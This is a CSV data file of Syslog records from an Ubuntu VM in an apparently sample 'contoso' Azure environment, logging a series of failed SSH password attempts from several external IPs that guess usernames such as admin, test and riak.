+19185,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:21:57,UbuntuDevEnv,2019-06-26 13:21:56,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 55906:11: Bye Bye [preauth],124285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,55906,,
+19186,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:32:23,UbuntuDevEnv,2019-06-26 13:32:22,auth,UbuntuDevEnv,info,Invalid user ian from 157.230.115.27 port 43304,126642,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ian,157.230.115.2,43304,,
+19187,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:32:23,UbuntuDevEnv,2019-06-26 13:32:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,126642,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19188,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:32:23,UbuntuDevEnv,2019-06-26 13:32:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,126642,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+19189,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:32:25,UbuntuDevEnv,2019-06-26 13:32:24,auth,UbuntuDevEnv,info,Failed password for invalid user ian from 157.230.115.27 port 43304 ssh2,126642,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ian,157.230.115.2,43304,,
+19190,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:32:25,UbuntuDevEnv,2019-06-26 13:32:24,auth,UbuntuDevEnv,info,Disconnected from invalid user ian 157.230.115.27 port 43304 [preauth],126642,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ian,157.230.115.2,43304,,
+19191,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:32:25,UbuntuDevEnv,2019-06-26 13:32:24,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 43304:11: Bye Bye [preauth],126642,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,43304,,
+19192,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:32:38,UbuntuDevEnv,2019-06-26 13:32:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144  user=test,126692,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,196.46.36.1,,0,
+19193,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:32:39,UbuntuDevEnv,2019-06-26 13:32:39,auth,UbuntuDevEnv,info,Failed password for test from 196.46.36.144 port 60343 ssh2,126692,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,60343,,
+19194,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:32:39,UbuntuDevEnv,2019-06-26 13:32:39,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 60343:11: Bye Bye [preauth],126692,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,60343,,
+19195,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:32:39,UbuntuDevEnv,2019-06-26 13:32:39,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 196.46.36.144 port 60343 [preauth],126692,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,196.46.36.1,60343,,
+19196,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:33:11,UbuntuDevEnv,2019-06-26 13:33:11,auth,UbuntuDevEnv,info,Invalid user admin from 139.199.34.112 port 57874,126805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,139.199.34.1,57874,,
+19197,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:33:11,UbuntuDevEnv,2019-06-26 13:33:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.34.112,126805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.34.1,,0,
+19198,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:33:11,UbuntuDevEnv,2019-06-26 13:33:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,126805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19199,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:33:13,UbuntuDevEnv,2019-06-26 13:33:13,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 139.199.34.112 port 57874 ssh2,126805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,139.199.34.1,57874,,
+19200,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:33:13,UbuntuDevEnv,2019-06-26 13:33:13,auth,UbuntuDevEnv,info,Received disconnect from 139.199.34.112 port 57874:11: Bye Bye [preauth],126805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.34.1,57874,,
+19201,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:33:13,UbuntuDevEnv,2019-06-26 13:33:13,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 139.199.34.112 port 57874 [preauth],126805,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,139.199.34.1,57874,,
+19202,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:40:35,UbuntuDevEnv,2019-06-26 13:40:35,auth,UbuntuDevEnv,info,Invalid user trade from 196.46.36.144 port 56619,128393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,trade,196.46.36.1,56619,,
+19203,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:40:35,UbuntuDevEnv,2019-06-26 13:40:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,128393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
+19204,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:40:35,UbuntuDevEnv,2019-06-26 13:40:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,128393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19205,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:40:37,UbuntuDevEnv,2019-06-26 13:40:37,auth,UbuntuDevEnv,info,Failed password for invalid user trade from 196.46.36.144 port 56619 ssh2,128393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,trade,196.46.36.1,56619,,
+19206,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:40:37,UbuntuDevEnv,2019-06-26 13:40:37,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 56619:11: Bye Bye [preauth],128393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,56619,,
+19207,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:40:37,UbuntuDevEnv,2019-06-26 13:40:37,auth,UbuntuDevEnv,info,Disconnected from invalid user trade 196.46.36.144 port 56619 [preauth],128393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,trade,196.46.36.1,56619,,
+19208,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:40:58,UbuntuDevEnv,2019-06-26 13:40:57,auth,UbuntuDevEnv,info,Invalid user riak from 201.48.54.81 port 35917,128472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,riak,201.48.54.8,35917,,
+19209,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:40:58,UbuntuDevEnv,2019-06-26 13:40:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,128472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+19210,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:40:58,UbuntuDevEnv,2019-06-26 13:40:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,128472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19211,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:40:59,UbuntuDevEnv,2019-06-26 13:40:59,auth,UbuntuDevEnv,info,Failed password for invalid user riak from 201.48.54.81 port 35917 ssh2,128472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,riak,201.48.54.8,35917,,
+19212,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:41:00,UbuntuDevEnv,2019-06-26 13:40:59,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 35917:11: Bye Bye [preauth],128472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,35917,,
+19213,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:41:00,UbuntuDevEnv,2019-06-26 13:41:00,auth,UbuntuDevEnv,info,Disconnected from invalid user riak 201.48.54.81 port 35917 [preauth],128472,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,riak,201.48.54.8,35917,,
+19214,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:41:01,UbuntuDevEnv,2019-06-26 13:41:01,auth,UbuntuDevEnv,info,Invalid user pepe from 157.230.115.27 port 45416,128498,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pepe,157.230.115.2,45416,,
+19215,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:41:01,UbuntuDevEnv,2019-06-26 13:41:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,128498,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+19216,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:41:01,UbuntuDevEnv,2019-06-26 13:41:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,128498,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19217,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:41:03,UbuntuDevEnv,2019-06-26 13:41:03,auth,UbuntuDevEnv,info,Failed password for invalid user pepe from 157.230.115.27 port 45416 ssh2,128498,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pepe,157.230.115.2,45416,,
+19218,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:41:03,UbuntuDevEnv,2019-06-26 13:41:03,auth,UbuntuDevEnv,info,Disconnected from invalid user pepe 157.230.115.27 port 45416 [preauth],128498,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pepe,157.230.115.2,45416,,
+19219,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:41:03,UbuntuDevEnv,2019-06-26 13:41:03,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 45416:11: Bye Bye [preauth],128498,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,45416,,
+19220,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:43:22,UbuntuDevEnv,2019-06-26 13:43:22,auth,UbuntuDevEnv,info,Invalid user prueba from 201.48.54.81 port 44316,128995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prueba,201.48.54.8,44316,,
+19221,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:43:22,UbuntuDevEnv,2019-06-26 13:43:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,128995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+19222,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:43:22,UbuntuDevEnv,2019-06-26 13:43:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,128995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19223,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:43:25,UbuntuDevEnv,2019-06-26 13:43:24,auth,UbuntuDevEnv,info,Failed password for invalid user prueba from 201.48.54.81 port 44316 ssh2,128995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prueba,201.48.54.8,44316,,
+19224,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:43:25,UbuntuDevEnv,2019-06-26 13:43:24,auth,UbuntuDevEnv,info,Disconnected from invalid user prueba 201.48.54.81 port 44316 [preauth],128995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prueba,201.48.54.8,44316,,
+19225,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:43:25,UbuntuDevEnv,2019-06-26 13:43:24,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 44316:11: Bye Bye [preauth],128995,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,44316,,
+19226,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:44:28,UbuntuDevEnv,2019-06-26 13:44:28,auth,UbuntuDevEnv,info,Invalid user adm from 157.230.115.27 port 51904,129242,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,157.230.115.2,51904,,
+19227,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:44:28,UbuntuDevEnv,2019-06-26 13:44:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,129242,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+19228,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:44:28,UbuntuDevEnv,2019-06-26 13:44:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,129242,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19229,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:44:30,UbuntuDevEnv,2019-06-26 13:44:30,auth,UbuntuDevEnv,info,Failed password for invalid user adm from 157.230.115.27 port 51904 ssh2,129242,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,157.230.115.2,51904,,
+19230,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:44:30,UbuntuDevEnv,2019-06-26 13:44:30,auth,UbuntuDevEnv,info,Disconnected from invalid user adm 157.230.115.27 port 51904 [preauth],129242,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,157.230.115.2,51904,,
+19231,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:44:30,UbuntuDevEnv,2019-06-26 13:44:30,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 51904:11: Bye Bye [preauth],129242,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,51904,,
+19232,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:45:44,UbuntuDevEnv,2019-06-26 13:45:44,auth,UbuntuDevEnv,info,Invalid user vboxuser from 201.48.54.81 port 52714,129596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vboxuser,201.48.54.8,52714,,
+19233,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:45:44,UbuntuDevEnv,2019-06-26 13:45:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,129596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19234,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:45:44,UbuntuDevEnv,2019-06-26 13:45:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,129596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+19235,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:45:46,UbuntuDevEnv,2019-06-26 13:45:45,auth,UbuntuDevEnv,info,Failed password for invalid user vboxuser from 201.48.54.81 port 52714 ssh2,129596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vboxuser,201.48.54.8,52714,,
+19236,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:45:46,UbuntuDevEnv,2019-06-26 13:45:46,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 52714:11: Bye Bye [preauth],129596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,52714,,
+19237,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:45:46,UbuntuDevEnv,2019-06-26 13:45:46,auth,UbuntuDevEnv,info,Disconnected from invalid user vboxuser 201.48.54.81 port 52714 [preauth],129596,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vboxuser,201.48.54.8,52714,,
+19238,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:45:47,UbuntuDevEnv,2019-06-26 13:45:46,auth,UbuntuDevEnv,info,Invalid user beng from 196.46.36.144 port 44724,129602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,beng,196.46.36.1,44724,,
+19239,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:45:47,UbuntuDevEnv,2019-06-26 13:45:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,129602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
+19240,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:45:47,UbuntuDevEnv,2019-06-26 13:45:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,129602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19241,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:45:48,UbuntuDevEnv,2019-06-26 13:45:48,auth,UbuntuDevEnv,info,Failed password for invalid user beng from 196.46.36.144 port 44724 ssh2,129602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,beng,196.46.36.1,44724,,
+19242,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:45:49,UbuntuDevEnv,2019-06-26 13:45:48,auth,UbuntuDevEnv,info,Disconnected from invalid user beng 196.46.36.144 port 44724 [preauth],129602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,beng,196.46.36.1,44724,,
+19243,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:45:49,UbuntuDevEnv,2019-06-26 13:45:48,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 44724:11: Bye Bye [preauth],129602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,44724,,
+19244,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:46:02,UbuntuDevEnv,2019-06-26 13:46:02,auth,UbuntuDevEnv,info,Invalid user carol from 139.199.34.112 port 39698,129641,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,carol,139.199.34.1,39698,,
